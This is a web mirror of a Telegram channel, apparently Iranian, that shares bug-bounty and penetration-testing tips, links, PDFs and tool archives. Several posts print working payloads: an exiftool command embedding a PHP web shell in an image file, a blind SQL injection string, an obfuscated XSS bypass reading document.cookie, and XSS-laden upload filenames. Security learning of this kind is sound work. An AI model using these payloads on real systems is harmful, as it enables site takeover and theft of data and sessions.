Telegram Web Link
bootg.com » United States » PenTest Team » Telegram Web
PenTest Team
🗒 Bypass Upload Tricky

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files

@PenTest_Tm
👍7💯2
18.6K viewsedited  
PenTest Team
@cryptosignalsfree12

بچهایی که تو کار کریپتو هستن میتونید استفاده کنید
👍51
18.2K views
PenTest Team
🗒 Optimizing Blind SQL Injection Detection with Content-Length Differences

https://bountysecurity.ai/blogs/news/optimizing-blind-sql-injection-detection-with-content-length-differences


@PenTest_Tm
👍5
17.9K viewsedited  
PenTest Team
🗒 MetaMask Subdomain Takeover (Consensys) | $500 Bug Bounty Poc | Subdomain Takeover Method

https://youtu.be/xP-u9i3N-3U?si=ooLVhCem9w5aSWos


@PenTest_Tm
👍5
21K views
PenTest Team
🗒 How I was able to discover ATO Via IDOR vulnerability


https://medium.com/@0x_xnum/idor-leads-to-account-takeover-of-all-users-ato-27af312c8481


@PenTest_Tm
👍4
22.5K views
PenTest Team
priv8-Nuclei-.zip
845.8 KB
@PenTest_Tm
👍7🤔4😁21
17.9K views
PenTest Team
A Bug Hunter's Diary.pdf
5.2 MB
@PenTest_Tm
👍4
21.8K views
PenTest Team
🗒 SQLMap Command Generator


@PenTest_Tm
🔥10👍41
17.9K views
PenTest Team
🗒SSTI - RCE - CI


https://dolomite-slip-02b.notion.site/SSTI-RCE-CI-76c2f9d2808649c197d08b0d0ecd0e5b?pvs=25


@PenTest_Tm
👍53
10.9K viewsedited  
PenTest Team
bounty_tips_100+.pdf
18.3 MB
🗒 Bug Bounty Tips


@PenTest_Tm
8🔥3👍1
6.62K views
PenTest Team
🗒 XSS Payload Generator

تولید Payload با سناریو های مختلف و پشتیبانی از انواع متد با قابلیت ساخت پیلود برای دور زدن WAF و همچنین مبهم سازی پیلود و اضافه کردن کد جاوااسکریپت برای ساخت پیلود های پیشرفته تر و فیلتر پیشرفته کاراکترها برای دور زدن محدودیت هایی که هست


@PenTest_Tm
16👍3❤‍🔥2🤔1
5.78K views
PenTest Team
🗒 Bypass File Upload Filtering

In image:

exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>'
shell.jpg
mv shell.jpg shell.php.jpg



@PenTest_Tm
2👍2
4.29K views
PenTest Team
🗒 SQL Injection

After this, use sqlmap to extract the database 

-11+PROCEDURE+ANALYSE(EXTRACTVALUE(9859,CONCAT(0x5c,(BENCHMARK(110000000,MD5(0x7562756f))))),1)--


@PenTest_Tm
5❤‍🔥2
5.86K views
PenTest Team
🗒 Bypass XSS Filter with Array 


<noscript><p title="</noscript><img src=x onerror=([,O,B,J,E,C,,]=[]+{},[T,R,U,E,F,A,L,S,,,N]=[!!O]+!O+B.E)[X=C+O+N+S+T+R+U+C+T+O+R][X](A+L+E+R+T+(document.cookie))()>">



@PenTest_Tm
🗿9👍4
5.59K views
PenTest Team
بچها عیدتون مبارک ایشالا سال خوبی داشته باشین❤️
21🥰2👏1
5.25K views
PenTest Team
🗒 File Upload via XSS

If you found a file upload function for an image, try introducing an image with XSS in the filename like so:
<img src=x onerror=alert('XSS')>.png
"><img src=x onerror=alert('XSS')>.png
"><svg onmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png


@PenTest_Tm
8
6.66K views
PenTest Team
APIs Fuzzing for Bug Bounty.pdf
164.9 KB
🗒 APIs Fuzzing for Bug Bounty


@PenTest_Tm
🔥9
7.1K views
PenTest Team
TCM - Practical API Hacking.zip
2.8 GB
🗒 TCM - Practical API Hacking


@PenTest_Tm
5👍3
8.47K views
PenTest Team
API_Hacking_with_Javascript_Checklist.pdf
47.1 MB
🗒 API Hacking with Javascript Checklist


@PenTest_Tm
🔥10🍌3👍2
11.2K views
PenTest Team
رسما بگا رفتیم احتمال زیاد وضعیت اینترنت خیلی بدتر میشه 🖤
😢17👍74🎉1
3.75K viewsedited  
2025/07/08 13:29:32
Back to Top
HTML Embed Code: